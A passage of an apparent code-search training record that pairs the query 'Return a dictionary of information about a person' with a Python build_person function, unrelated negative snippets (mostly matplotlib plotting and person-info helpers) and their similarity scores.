'yo')\n\n # Now run through the 9 sub axes and display the image data and cutout location.\n self._sub_window_filenames = []\n for ii, axis in enumerate(self._sub_windows):\n axis.clear()\n\n fits_filename, filename, sliceno, middle = self._process_result_filename_cutout_number[inds[ii]]\n print('display from tsne fits: {} filename: {}'.format(fits_filename, filename))\n\n # So, the filename actually contains the wrong path on it so we\n # need to take it off and use the proper path.\n pf = pickle.load(open(os.path.join(self._cutouts_directory, filename), 'rb'))\n ff = list(glob.iglob('{}/**/{}'.format(self._data_directory, pf['filename'].split('/')[-1])))[0]\n\n print(ff)\n self._display_window(axis, ff)\n self._sub_window_filenames.append(fits_filename)\n\n # Draw the line\n axis.plot([middle[0]-112, middle[0]-112], [middle[1]-112, middle[1]+112], 'y')\n axis.plot([middle[0]+112, middle[0]+112], [middle[1]-112, middle[1]+112], 'y')\n axis.plot([middle[0]-112, middle[0]+112], [middle[1]-112, middle[1]-112], 'y')\n axis.plot([middle[0]-112, middle[0]+112], [middle[1]+112, middle[1]+112], 'y')\n\n plt.figure(1).show()\n plt.figure(1).canvas.draw()", "def initial_plots(runs):\n for run in runs.keys():\n meta = runs[run]\n plot_pdfs(meta)\n plot_priorsamps(meta)\n plot_ivals(meta)\n# if meta.truNz is not None:\n# plot_true(meta)\n timesaver(meta,'iplot',meta.key)", "def plot_mt_lb(self, subject_id:str, style:str, bin_state:bool=False, lag:Optional[Real]=None) -> Tuple[pd.DataFrame, pd.DataFrame]:\n import matplotlib.pyplot as plt\n df_lb = self.load_labels(subject_id)\n fig, ax_lb = plt.subplots(figsize=(20,4))\n if bin_state:\n df_lb[\"sleep_stage\"] = df_lb[\"sleep_stage\"].apply(lambda ss: self.to_binary_labels[ss])\n ax_lb.plot(df_lb[\"sec\"].values, df_lb[\"sleep_stage\"].values, color=\"red\")\n ax_lb.set_yticks(np.arange(0,3,1))\n ax_lb.set_yticklabels([\"unscored\",\"sleep\",\"wake\"])\n else:\n df_lb[\"sleep_stage\"] = df_lb[\"sleep_stage\"].apply(lambda ss: self.to_conventional_labels[ss])\n ax_lb.plot(df_lb[\"sec\"].values, df_lb[\"sleep_stage\"].values, color=\"red\")\n ax_lb.set_yticks(np.arange(0,7,1))\n ax_lb.set_yticklabels([\"unscored\",\"N4\",\"N3\",\"N2\",\"N1\",\"REM\",\"wake\"])\n \n lb_rg_t = df_lb.iloc[[0,-1]][\"sec\"].values\n df_mt = self.load_motion_data(subject_id)\n if lag is not None:\n lb_rg_t[0] = lb_rg_t[0]-lag\n lb_rg_t[-1] = lb_rg_t[-1]+lag\n df_mt = df_mt[(df_mt[\"sec\"]>=lb_rg_t[0])&(df_mt[\"sec\"]<=lb_rg_t[1])]\n ax_mt = ax_lb.twinx()\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"x\"].values, label=\"x\")\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"y\"].values, label=\"y\")\n ax_mt.plot(df_mt[\"sec\"].values, df_mt[\"z\"].values, label=\"z\")\n ax_mt.legend(loc=\"best\")\n return df_lb, df_mt", "def setup(self, flags):\n self.figure = pylab.figure(1)\n self.axes = {}\n self.stream_data = {}\n self.flags = flags", "def plot_frames(beads, sim, ti, tf, savebase):\n \n ### define the color for the spheres\n\n print 'defining colors'\n sphere_rgbcolor = gen_colors(sim.nbeads)\n\n ### create povray settings\n\n print 'creating povray settings'\n sphere_radius, img_widthpx, img_heightpx, povray_includes, \\\n povray_defaults, sun1, sun2, background, povray_cam, quality \\\n = gen_img_settings_quality(sim.lx)\n \n zi = np.zeros((sim.nbeads))\n \n ### set general plot properties\n\n os.system(\"mkdir -p \" + savebase)\n savebase += 'eps_' + str(sim.eps) + '_fp_' + str(sim.fp) + \\\n '_areak_' + str(sim.areak) + '_kappa_' + str(sim.kappa) + '/'\n os.system(\"mkdir -p \" + savebase)\n \n ### plot the frames\n \n for step in range(ti, tf):\n \n time = step*sim.dt\n print 'Step / Total : ', step, tf\n \n ### create povray items\n \n print 'generating povray item'\n particles = vapory.Object( \\\n vapory.Union( \\\n *[ vapory.Sphere([beads.xi[step, 0, j], beads.xi[step, 1, j],zi[j]], \\\n sphere_radius, vapory.Texture( \\\n vapory.Pigment('color', sphere_rgbcolor[j]), \\\n vapory.Finish('phong',1)) ) for j in range(0, sim.nbeads ) ] ) )\n\n ### generate povray objects\n\n print 'generating povray objects'\n povray_objects = [sun1, sun2, background, particles]\n ### create the scene\n scene = vapory.Scene( camera = povray_cam,\n objects = povray_objects, \n included = povray_includes, \n defaults = povray_defaults )\n \n ### render image\n \n print 'rendering scene'\n savename = \"pov-frame-\" + \"{0:05d}\".format(int(step)) + \".png\"\n scene.render(outfile=savename, width=img_widthpx, height=img_heightpx, \\\n antialiasing=0.001, quality=quality, remove_temp=True)\n \n ### move the image to the correct destination\n \n os.system('mv ' + savename + ' ' + savebase)\n \n return", "def plot_tags(self,seconds=False):\n plot_add_tags(self.tags,seconds)\n return", "def plot(self):\n\t\tself.plotOfSpect().plot()", "def make_plot(x,y):", "def plot_xyzt(grbdir,ax, x, y, z, t):\n global runconf\n\t\n colors = ['blue', 'gray', 'red', 'black']\n names = ['X', 'Y', 'Z', grbdir]\n zdirs = ['x', 'y', 'z', None]\n\n mkffile = runconf['mkffile']\n trigtime = runconf['trigtime']\n ra_tran = runconf['ra']\n dec_tran = runconf['dec']\n mkfdata = fits.getdata(mkffile, 1)\n window = 10\n sel = abs(mkfdata['time'] - trigtime) < window\t\n \n earthx = -np.median(mkfdata['posx'][sel])\n earthy = -np.median(mkfdata['posy'][sel]) \n earthz = -np.median(mkfdata['posz'][sel]) \n \n earth_vec_mag = np.sqrt(earthx**2 + earthy**2 + earthz**2)\n \n earth = coo.SkyCoord(earthx, earthy, earthz, frame='icrs', representation='cartesian')\n \t\t\t\n ax.set_xlim(-1.2,1.2)\n ax.set_ylim(-1.2,1.2)\n ax.set_zlim(-1.2,1.2)\n\n for count, dirn in enumerate([x, y, z, t]):\n xx, yy, zz = dirn.cartesian.x.value, dirn.cartesian.y.value, dirn.cartesian.z.value\n ax.quiver(0, 0, 0, xx, yy, zz, color=colors[count])\n ax.text(xx, yy, zz, names[count], zdirs[count])\n\t\n ax.quiver(0,0,0,earthx/earth_vec_mag,earthy/earth_vec_mag,earthz/earth_vec_mag,color='green') \n ax.text(earthx/earth_vec_mag,earthy/earth_vec_mag,earthz/earth_vec_mag,'Earth')\n \n #ax.set_xlabel(\"RA = 0\")\n #ax.set_zlabel(\"Pole\")\n return", "def plot(self):\n # Get data\n #print(self.file_name)\n fig, ax = plb.subplots(1,1,figsize=(18,20))\n for key,value in self.testTrend.items():\n x = np.arange(len(self.data_array))\n y = np.asarray(value)\n plb.plot(x,y, label=key)\n ax.scatter(x, y)\n for i in range(0, len(value)):\n ax.annotate(str(i), (x[i], y[i]))\n # Title\n plb.title(self.file_name)\n # Legend\n plb.legend(bbox_to_anchor=(.05, 1), loc='best', borderaxespad=0.)\n # x ticks\n plb.xticks(np.arange(min(x), max(x) + 1, 2.0))\n #plb.ylim(-250, 1)\n # Show image\n plb.show()", "def plot_dataset(self):\n plt.plot(self.ground_truth, marker='o')\n plt.ylabel('Number of Topics')\n plt.xlabel('Window Number')\n plt.yticks(list(set(self.ground_truth)))\n plt.savefig(os.path.join(self.output_path, 'shift-plot.pdf'))", "def setup_plot(self):\n x, y = next(self.stream).T\n c = None\n s = 100\n self.scat = self.ax.scatter(x, y, c=c, s=s, \n vmin=0, vmax=1,\n cmap=\"jet\", edgecolor=\"k\")\n self.ax.axis([0, 16.5, 0, 5])\n self.ax.set_ylabel('wouldbe x')\n self.ax.set_xlabel('wouldbe y')\n # return the updated artist to FuncAnimation\n # It expects a sequence of artists, thus the trailing comma.\n return self.scat,", "def trajectory_plotter(trajectories, title = \"Trajectories\"):\r\n\r\n fig = plt.figure()\r\n ax = fig.add_subplot(projection=\"3d\")\r\n\r\n ax.set_xlabel('X')\r\n ax.set_ylabel('Y')\r\n ax.set_zlabel('Z')\r\n ax.set_title(title)\r\n\r\n for i in range(trajectories.shape[0]):\r\n ax.plot(trajectories[i, 0, :], trajectories[i, 1, :], trajectories[i, 2, :], label=f\"Bird {i}\")\r\n\r\n # ax.legend()\r\n\r\n return plt.show()", "def plot_fig43a_looping_TSS(a=10, loglog=True):\n\n fig, ax = plt.subplots(figsize=(default_width, default_height))\n #convert a to basepairs\n a_in_bp = a / ncg.dna_params['lpb']\n links35 = np.tile(35, 44)\n Rlinks = np.array([47, 21, 18, 15, 20, 17])\n Llinks = np.array([245, 30, 26, 15, 23, 35])\n #links to right of methylation site (50 in total)\n Rlinks = np.concatenate((Rlinks, links35))\n #links to left of methylation site (50 in total)\n Llinks = np.concatenate((Llinks, links35))\n #cumulative chain length including burried basepairs\n unwrap = 0\n #plot as positive distance from TSS in bp\n ldna_Rlinks = convert.genomic_length_from_links_unwraps(Rlinks, unwraps=unwrap) #max WLC chain length in bp\n #plot as negative distance from TSS in bp\n ldna_Llinks = -1*convert.genomic_length_from_links_unwraps(Llinks, unwraps=unwrap) #max WLC chain length in bp\n rvals = np.linspace(0.0, 1.0, 1000)\n integral_R = np.load('../deepti/csvs/Bprops/0unwraps/heterogenous/Sarah/Rlinks_1to50nucs/kinkedWLC_greens_Rlinks_50nucs_1000rvals.npy')\n integral_L = np.load('../deepti/csvs/Bprops/0unwraps/heterogenous/Sarah/Llinks_1to50nucs/kinkedWLC_greens_Llinks_50nucs_1000rvals.npy')\n Prob_a_Rlinks_kinked = wlc.prob_R_in_radius_a_given_L(a_in_bp, integral_R, rvals, Rlinks, unwrap)\n Prob_a_Llinks_kinked = wlc.prob_R_in_radius_a_given_L(a_in_bp, integral_L, rvals, Llinks, unwrap)\n #plot in units of nm^(-3)\n ax.plot(ldna_Rlinks, Prob_a_Rlinks_kinked/(ncg.dna_params['lpb']**3), '-o', markersize=3, color=teal_flucts)\n ax.plot(ldna_Llinks, Prob_a_Llinks_kinked/(ncg.dna_params['lpb']**3), '-o', markersize=3, color=teal_flucts)\n plt.xlabel(r'Distance from TSS (bp)')\n plt.ylabel(r'$P_\\mathrm{loop}(a=10\\mathrm{nm}; L)\\;\\;\\;(\\mathrm{nm}^{-3})$')\n plt.subplots_adjust(left=0.16, bottom=0.19, top=0.98, right=0.96)\n plt.yscale('log')\n plt.ylim([10**-3, 10**-0.4])\n plt.xlim([-10000, 10000])\n plt.savefig(f'plots/thesis/fig43a_looping-TSS-yeast.pdf', bbox_inches='tight')", "def animate(i): \n ax1.clear()\n font_dict = {'family':'sans-serif',\n 'color':'darkred',\n 'size':8}\n for i in range(len(xt)):\n ax1.text(xt[i], yt[i], tt[i], fontdict=font_dict)\n ax1.plot(xs, ys)\n #ax1.scatter(xt, yt, 'yo')\n\n # This is for plotting the coordinates and the class of the detected object\n animated_plot = plt.plot(xt, yt, 'yo')[0]\n animated_plot.set_xdata(xt)\n animated_plot.set_ydata(yt)\n plt.draw()", "def plot_trajectories_XYZ(t_start,t_stop):\n \n time, ankle_l_trajectory, ankle_r_trajectory,foot_l_contact,foot_r_contact,muscle_lh_activations, muscle_rh_activations,muscle_lh_forces,muscle_rh_forces,joint_lh_positions,joint_rh_positions = load_data()\n \n index_start = np.where(time == t_start)[0][0]\n index_end = np.where(time == t_stop)[0][0]\n \n time = time[index_start:index_end+1]\n ankle_l_trajectory = ankle_l_trajectory[index_start:index_end+1,:]\n ankle_r_trajectory = ankle_r_trajectory[index_start:index_end+1,:]\n \n #time=np.linspace(1,len(ankle_l_trajectory[:,0]),len(ankle_l_trajectory[:,0]));\n \n plt.figure('Trajectories')\n plt.subplot(311)\n plt.plot(time,ankle_l_trajectory[:,0])\n plt.plot(time,ankle_r_trajectory[:,0])\n #plt.title('Trajectory of the X component')\n plt.xlabel('Time [s]')\n plt.ylabel('X Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n plt.subplot(312)\n plt.plot(time,ankle_l_trajectory[:,1])\n plt.plot(time,ankle_r_trajectory[:,1])\n #plt.title('Trajectory of the Y component')\n plt.xlabel('Time [s]')\n plt.ylabel('Y Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n plt.subplot(313)\n plt.plot(time,ankle_l_trajectory[:,2])\n plt.plot(time,ankle_r_trajectory[:,2])\n #plt.title('Trajectory of the Z component')\n plt.xlabel('Time [s]')\n plt.ylabel('Z Position [cm]')\n plt.legend(['Left ankle','Right ankle'],loc='upper right')\n \n# plt.suptitle('Decomposition of the trajectories of the hind feet')\n return", "def plotForGif(s, ne, gs):\n fig, ax = plt.subplots()\n ax.set_title('time: {0}'.format(s.time))\n ax.scatter(s.carPos[:, 0] , s.carPos[:, 1], c = 'k', alpha=0.5)\n for i in range(ne):\n if (s.eventTimes[i] <= 0) and (s.eventCloseTimes[i]>=0 and (not s.eventsAnswered[i]) and (not s.eventsCanceled[i])):\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'b', alpha = 0.7)\n elif (s.eventsAnswered[i]):\n ax.scatter(s.eventPos[i,0], s.eventPos[i,1], c = 'g', alpha = 0.2)\n elif (s.eventsCanceled[i]):\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'r', alpha = 0.2)\n else:\n ax.scatter(s.eventPos[i, 0], s.eventPos[i, 1], c = 'y', alpha = 0.2)\n\n ax.set_xlim([-1, gs + 1])\n ax.set_ylim([-1, gs + 1])\n ax.grid(True)\n\n # Used to return the plot as an image rray\n fig.canvas.draw() # draw the canvas, cache the renderer\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n return image" ]
[ "0.59035116", "0.58859456", "0.578238", "0.5767331", "0.5742631", "0.57282263", "0.55894816", "0.5575051", "0.5565919", "0.55595213", "0.554277", "0.5542592", "0.55424595", "0.5524052", "0.5506664", "0.55034083", "0.5472254", "0.54397625", "0.54324085", "0.5425673", "0.54157317", "0.54133844", "0.5412371", "0.5399858", "0.53945", "0.538516", "0.5383022", "0.53827167", "0.53777903", "0.53697264", "0.5366976", "0.53627956", "0.5362065", "0.5360055", "0.5354667", "0.53496313", "0.5348603", "0.5345482", "0.53409696", "0.53133553", "0.53099316", "0.53067076", "0.5306027", "0.5304991", "0.52948475", "0.52939993", "0.52828676", "0.5282647", "0.5271287", "0.5266033", "0.5265542", "0.52644217", "0.5257214", "0.5251664", "0.5246394", "0.52456456", "0.5244925", "0.52431566", "0.52394", "0.5233951", "0.52264106", "0.52240163", "0.5223771", "0.521851", "0.5218214", "0.5210425", "0.5208816", "0.5205828", "0.52048224", "0.5203102", "0.5201909", "0.5192149", "0.51875097", "0.51836634", "0.51823133", "0.51823133", "0.5181849", "0.5180532", "0.517766", "0.5175277", "0.5171722", "0.5171223", "0.51702887", "0.5169149", "0.5168996", "0.5168447", "0.5165273", "0.51598805", "0.5151698", "0.5148313", "0.5141931", "0.5140935", "0.5139777", "0.51368016", "0.5134908", "0.51347786", "0.51315707", "0.51295567", "0.5129034", "0.5128166" ]
0.6715108
0
Return a dictionary of information about a person
def build_person(first_name,last_name, age =''): person = { 'first': first_name.title(), 'last' : last_name.title()} if age: person['age'] = age return person
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_person(self):\n person_dict = {\n 'firstname': self.__firstname,\n 'lastname': self.__lastname,\n 'height': self.__height,\n 'weight': self.__weight,\n 'age': self.__age\n }\n return person_dict", "def who_am_i():\n return {'name': 'Jonathan Martinez', 'id': '201095569', 'email': 'martijon@post.bgu.ac.il'}", "def get_person(self, url: str) -> dict:\n person = self.read_html(url)\n\n return {\n # TODO: There's a better way of doing this.\n self._columns[0]: person.select_one(\"h1\").text.strip(),\n self._columns[1]: person.select_one(\".party-membership--party\").text,\n self._columns[2]: \"; \".join(\n [a.text for a in person.select('[href^=\"tel:\"]')]\n ),\n self._columns[3]: \"; \".join(\n [a.text for a in person.select(\".email-address a\")]\n ),\n self._columns[4]: \"; \".join(\n [a.text.strip() for a in person.select(\".contact-actions__twitter\")]\n ),\n }", "def parse_person(person):\n person_name = person['name']\n person_id = person['id']\n\n pages = get_pages_from_wiki_search(person_name)\n page = select_page_like_person(pages, person)\n\n wiki_person = {\n 'id': person_id, 'fullname': person_name,\n 'url': page.get('fullurl', None), \n 'declarator_profile': page.get('declarator_profile', None),\n 'words_intersection': page.get('words_intersection', None),\n }\n\n # if page with image\n if 'pageimage' in page:\n try:\n image = page['pageimage']\n url = page['original']['source']\n license = get_license_from_wiki(image, is_file=True)\n\n photo = {'title': image, 'url': url, 'license': license}\n wiki_person['photo'] = photo\n except KeyError as e:\n message = \"person_id: %i, Not found key: %s\" % (person_id, e)\n Querylog.error(message)\n return wiki_person", "def get_user_info_by_name(self, username: str) -> dict:", "def showInfo(p,personDict):\n info1 = personDict['EnterpriseID'][p[0]]\n info2 = personDict['EnterpriseID'][p[1]]\n print (\"Person A:\",info1)\n print (\"Person B:\",info2)", "def display_person(person):\n name = person['name']\n followers = person['follower_count']\n description = person['description']\n country = person['country']\n print(f'{name}, a(n) {description}, from {country}.')\n return followers", "def get_person(self, id):\n try:\n person = Person.get(Person.id == id)\n data = model_to_dict(person)\n except DoesNotExist:\n response.status = 404\n data = \"Not found\"\n return dict(name='Person', data=data)", "def get_person_like_json(self):\n return json.dumps(self.get_person())", "def info() -> Dict[str, Any]:", "def get_info(self) -> Optional[Dict[str, Any]]:", "def current_person(self):\n d = self.people_table_data[self.row_i]\n\n # \"fullname\", \"lunaid\", \"age\", \"dob\", \"sex\", \"lastvisit\", \"maxdrop\", \"studies\",\n info = dict(zip(self.person_columns, d))\n info[\"pid\"] = d[8] # pid not shown\n\n # dont get fname and lname from table\n # could word split, but need to be accurate at least for edit module\n if self.sql:\n res = self.sql.query.get_name(pid=info[\"pid\"])\n info[\"fname\"] = res[0][0]\n info[\"lname\"] = res[0][1]\n return info\n # # main model\n # self.checkin_button.setEnabled(False)\n # print('people table: subject selected: %s' % d[8])\n # self.render_person(pid=d[8], fullname=d[0], age=d[2],\n # sex=d[4], lunaid=d[1])\n # self.render_schedule(ScheduleFrom.PERSON)", "def get_persons(self):\n response = self.do_request('/misc/user/export/json')\n if response:\n return response.json()", "def get_dictionary(self):\n data = {\n \"user_first_name\": self.user.first_name,\n \"user_last_name\": self.user.last_name,\n }\n dct = provider.Provider.get_dictionary(self)\n dct.update(data)\n return dct", "def _build_person_data(request):\n if hasattr(request, 'rollbar_person'):\n rollbar_person_prop = request.rollbar_person\n person = rollbar_person_prop() if callable(rollbar_person_prop) else rollbar_person_prop\n if person and isinstance(person, dict):\n return person\n else:\n return None\n\n if StarletteRequest:\n from rollbar.contrib.starlette.requests import hasuser\n else:\n def hasuser(request): return True\n\n if hasuser(request) and hasattr(request, 'user'):\n user_prop = request.user\n user = user_prop() if callable(user_prop) else user_prop\n if not user:\n return None\n elif isinstance(user, dict):\n return user\n else:\n retval = {}\n if getattr(user, 'id', None):\n retval['id'] = str(user.id)\n elif getattr(user, 'user_id', None):\n retval['id'] = str(user.user_id)\n\n # id is required, so only include username/email if we have an id\n if retval.get('id'):\n username = getattr(user, 'username', None)\n email = getattr(user, 'email', None)\n retval.update({\n 'username': username,\n 'email': email\n })\n return retval\n\n if hasattr(request, 'user_id'):\n user_id_prop = request.user_id\n user_id = user_id_prop() if callable(user_id_prop) else user_id_prop\n if not user_id:\n return None\n return {'id': str(user_id)}", "def info():\n # -------- Task 1 -------------------------\n # Please complete the following information\n\n return {\"agent name\": \"?\", # COMPLETE HERE\n \"student name\": [\"?\"], # COMPLETE HERE\n \"student number\": [\"?\"]} # COMPLETE HERE", "def get_donor_info(self):\n name = self.get_donor()\n if name in self.all_donors:\n person = self.r.hgetall(name)\n print(f\"Person: {name}\")\n for key, value in person.items():\n print(f\"{key}: {value}\")\n else:\n print(\"Name not in database.\")", "def who():\n cleanup()\n return {'available': userlist(), 'eta': data['etas'], 'etd': data['etds'], 'lastlocation': data['lastlocation'], 'ceitloch': ceitloch(), 'reminder': data['reminder']}", "def info(self) -> dict:", "def get_personal_info(self):\n self.get(\"INFO\",\"GetPersonalInfo\")\n response = self.send()\n return response", "def get_user_info_by_id(self, user_id: int) -> dict:", "def all_persons(self):\n all_persons = {}\n all_persons.update(self.staff)\n all_persons.update(self.fellows)\n return all_persons", "def get_people(self):\n url = self.base_url + 'memberships'\n\n req = requests.get(headers=self.headers, url=url)\n\n return req.json()", "def getData(self):\r\n return personData(\r\n self.title.getVal(),\r\n self.first.getVal(),\r\n self.middle.getVal(),\r\n self.last.getVal(),\r\n self.suffix.getVal(),\r\n self.phone.getVal(),\r\n self.ext.getVal(),\r\n self.email.getVal(),\r\n self.affiliation.getVal())", "def find(self, person):\n page = self.find_page(person)\n try:\n entity_id = self.get_entity_id(page.title)\n entity = self.get_entity(entity_id)\n person.dob = self.get_birthday(entity)\n person.occupation = self.get_occupation(entity)\n person.nationality = self.get_country_of_citizenship(entity)\n res_domicile = self.get_domicile(entity)\n if res_domicile:\n person.domicile = res_domicile\n elif person.nationality == self.get_birthcountry(entity):\n person.domicile = person.nationality # this is an assumption!\n birth_name = self.get_birth_name(entity)\n person.middle_name = self.get_middle_name(birth_name, person)\n if page:\n person.is_famous = 'True'\n else:\n person.is_famous = ''\n person.net_worth = self.get_networth(entity)\n person.description = page.summary\n person.set_raw()\n except:\n pass", "def get_author_info(self, author: str):\n for writer_word in self._writer_words:\n data = json.loads(requests.get(WIKIDATA_SEARCH + \"&srsearch=\" + author + \" \" + writer_word).text)\n pages = data.get(\"query\").get(\"search\")\n if len(pages) >= 1:\n pageid = pages[0].get(\"title\")\n author_details = self._reference.author_map.get(author)\n if author_details:\n return author_details\n if pageid == -1:\n continue\n\n else:\n response = requests.get(WIKIDATA_PARSE + pageid + \".json\")\n data = json.loads(response.text)\n if author.lower() not in data.get(\"entities\").get(pageid).get(\"labels\").get(\"en\").get(\"value\").lower():\n continue\n else:\n try:\n id = data.get(\"entities\").get(pageid).get(\"claims\").get(\"P31\")[0].get(\"mainsnak\").get(\"datavalue\").get(\"value\").get(\"id\")\n if str(id) != \"Q5\": # the id for human\n continue\n except IndexError:\n continue\n properties = data.get(\"entities\").get(pageid).get(\"claims\")\n author_details = {\"id\": pageid, \"gender\": self.get_gender(properties)}\n country_details = self.get_country(properties)\n author_details[\"country\"] = country_details\n self._reference.author_map[author] = author_details\n return author_details\n return {\"id\": \"Unknown\", \"gender\": \"Unknown\", \"country\": [{\"name\": \"Unknown\", \"region\": \"Unknown\"}]}", "def get_persons(self):\n response = self.do_request('/management/persons/export/json/')\n if response:\n return response.json()", "def get_details_for_email(email):\n try:\n result = dict(clearbit.Enrichment.find(email=email, stream=True))\n except HTTPError as e:\n logging.info('Skipping clearbit.com services. REASON %s', str(e))\n\n return {}\n\n return {\n 'first_name': result.get('person', {}).get('name', {}).get('givenName') or '',\n 'last_name': result.get('person', {}).get('name', {}).get('familyName') or '',\n 'gender': result.get('person', {}).get('gender') or '',\n 'bio': result.get('person', {}).get('bio') or ''\n }", "def fetch_extra_data(resource):\n person_id = resource.get(\"cern_person_id\")\n return dict(person_id=person_id)", "def get_contact_info(self):\n outputDict = {\"USERNAME\": consts.USERNAME,\n \"IP\": consts.IPADDRESS, \n \"MACHINE\": consts.HOSTNAME, \n \"EMAIL\": 'ckenne24@student.scad.edu', \n \"PHONE\": '203-722-6620'} # ::: TO DO::: dynamically get phone and email info automatically\n return outputDict", "def get_info_dict(self):\n return {\n 'bidi': self.bidi,\n 'code': self.code,\n 'name': self.name,\n 'name_local': self.name_local\n }", "def seat_profile(first_name, last_name, **passenger_info):\n\tprofile = {}\n\tprofile['first_name'] = first\n\tprofile['last_name'] = last\n\tfor key, value in passenger_info.items():\n\t\tprofile[key] = value\n\treturn profile", "def get_person(self, requestId):\n return self.get_json('/verification/%s/person' % str(requestId))", "def describe(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'age': calculate_current_age(self.birth_date),\n 'gender': self.gender,\n 'filmography': [appearance.movies.title for appearance in\n Appearance.query.filter(Appearance.actor_id == self.id).all()]\n }", "def infos(self):\r\n\t\tname = name\r\n\t\tlast_name = last_name", "def build_person(first_name, last_name, age=''):\r\n person = {'first':first_name, 'last':last_name}\r\n if age:\r\n person['age'] = age\r\n return person", "def to_dict(self) -> dict:\n return {\n 'author_id': self.id,\n 'fullname': self.fullname\n }", "def extract_user_info(user):\r\n return {\r\n 'username': user.username,\r\n 'email': user.email,\r\n 'first_name': user.first_name,\r\n 'last_name': user.last_name,\r\n }", "def extract_user_info(user):\r\n return {\r\n 'username': user.username,\r\n 'email': user.email,\r\n 'first_name': user.first_name,\r\n 'last_name': user.last_name,\r\n }", "def select_person():\r\n body = request.get_json()\r\n\r\n try:\r\n SELECT_PERSON_SCHEMA.validate(body)\r\n except SchemaError as err:\r\n raise ServiceBodyError(str(err))\r\n\r\n with sqlite_client:\r\n message = get_person(sqlite_client, body.get('id'))\r\n\r\n return jsonify({'name': message[0][1], 'cpf': message[0][2]})", "def get_person(request):\n\n email = request.args.get(\"email\", None, str)\n # log_info(\"email is \" + email)\n\n if not email:\n log_info(\"get_person was called, but no email was provided in request\")\n return None\n\n if validators.email(email) and (email_requester := auth.check_teacher(request)):\n if email_requester and validators.email(email_requester):\n db = database.Database()\n student = db.get_student(email)\n return dict(student)\n\n elif validators.email(email) and (email_requester := auth.check_login(request)):\n if email_requester and validators.email(email_requester) and email == email_requester:\n db = database.Database()\n student = db.get_student(email)\n if 'notes' in student:\n del student['notes']\n\n return dict(student)\n\n log_info(\"No person with email \" + email + \" found in database\")\n return None", "def user_data(self, access_token, *args, **kwargs):\n fields_selectors = ','.join(set(['id', 'first-name', 'last-name'] +\n self.setting('FIELD_SELECTORS', [])))\n # use set() over fields_selectors since LinkedIn fails when values are\n # duplicated\n url = 'https://api.linkedin.com/v1/people/~:(%s)' % fields_selectors\n raw_xml = self.oauth_request(access_token, url).content\n try:\n return to_dict(ElementTree.fromstring(raw_xml))\n except (ExpatError, KeyError, IndexError):\n return None", "def _to_dict(self):\n\t\treturn {'id': self.id,\n\t\t\t\t'name': self.name,\n\t\t\t\t'surname': self.surname}", "def get_user_details(self, response):\n name = response.get(\"name\")\n return {\n \"username\": str(response.get(\"account_id\")),\n \"email\": response.get(\"email\"),\n \"fullname\": name.get(\"display_name\"),\n \"first_name\": name.get(\"given_name\"),\n \"last_name\": name.get(\"surname\"),\n }", "def build_person(first_name, last_name, middle_name='', age=None): \n person = {'first': first_name, 'middle': middle_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def seat_profile(first, last, **passenger_info):\n profile = {}\n profile['first_name'] = first\n profile['last_name'] = last\n for key, value in passenger_info.items():\n profile[key] = value\n return profile", "def info():\n if g.party_id is None:\n # No party is configured for the current site.\n abort(404)\n\n party = party_service.get_party(g.party_id)\n\n return {\n 'party': party,\n }", "def get_persons():\n resp = requests.get(API_URL).content\n persons = json.loads(resp)\n return persons", "def seat_profile(first, last, **passenger_info):\n\tprofile = {}\n\tprofile['first_name'] = first\n\tprofile['last_name'] = last\n\tfor key, value in passenger_info.items():\n\t\tprofile[key] = value\n\treturn profile", "def identify_user(picture: str) -> Optional[dict]:\n data = api.identify_person_api(picture)\n return data.json()", "def __getstate__(self):\n\n # Get data in long format\n long = self.long_format()\n return {\"date\": self.date,\n \"persons\": long\n }", "def get_info(self):\n return {}", "def get_user_details(self, response):\n fullname, first_name, last_name = self.get_user_names(\n response.get(\"fullName\"),\n response.get(\"firstName\"),\n response.get(\"lastName\"),\n )\n return {\n \"username\": response.get(\"username\"),\n \"email\": response.get(\"email\") or \"\",\n \"fullname\": fullname,\n \"first_name\": first_name,\n \"last_name\": last_name,\n }", "def build_person(first_name, last_name, age=''):\n person = {'first': first_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def build_person(first_name, last_name, age=''):\n person = {'first': first_name, 'last': last_name}\n if age:\n person['age'] = age\n return person", "def enumerate_person(hf=0.5, age=(18, 60), n=100):\n for i in range(n):\n hfi = random.random() <= hf\n agei = random.randint(*age)\n namei = first_names[hfi]\n yield dict(gender=(1 if hfi else 0), age=agei, name=namei, idc=uuid.uuid4())", "def person_object_factory():\n person = {\n 'lastName': rl_fake().last_name(),\n 'gender': random.choice(('M', 'F'))\n }\n\n # Make the person's name match their gender.\n person['firstName'] = rl_fake().first_name_male() if person['gender'] == 'M' else rl_fake().first_name_female()\n\n # These are all optional in the DB. Over time, we'll try all possibilities.\n if flip():\n person['birthday'] = rl_fake().date_of_birth(minimum_age=18).strftime('%Y-%m-%d')\n if flip():\n person['phone'] = rl_fake().phone_number()\n if flip():\n person['email'] = rl_fake().email()\n return person", "def get_profile_info(self):\n\n drill_path = str(Path.home())+\"/Documents/ball_e_profiles/drill_profiles/{drill_name}/{drill_name}.csv\".format(\n drill_name=self.drill_name)\n with open(drill_path) as file:\n csv_reader = csv.reader(file, delimiter=',')\n row_count = 0\n info_dict = dict()\n for row in csv_reader:\n if row_count == 0:\n row_count += 1\n else:\n info_dict[row[0]] = [row[1], row[2], row[3]]\n row_count += 1\n\n return info_dict", "def to_cff_person(person: pybtex.database.Person) -> dict:\n # Map BibTeX to CFF fields\n name_fields = {\n \"last\": \"family-names\",\n \"bibtex_first\": \"given-names\",\n \"prelast\": \"name-particle\",\n \"lineage\": \"name-suffix\",\n }\n result = {\n cff_field: \" \".join(person.get_part(bibtex_field))\n for bibtex_field, cff_field in name_fields.items()\n if person.get_part(bibtex_field)\n }\n # Use CFF \"entity\" format if BibTex has no first & last names\n if list(result.keys()) == [\"family-names\"]:\n return {\"name\": result[\"family-names\"]}\n return result", "def get_author_info_from_people_collection(info):\n # 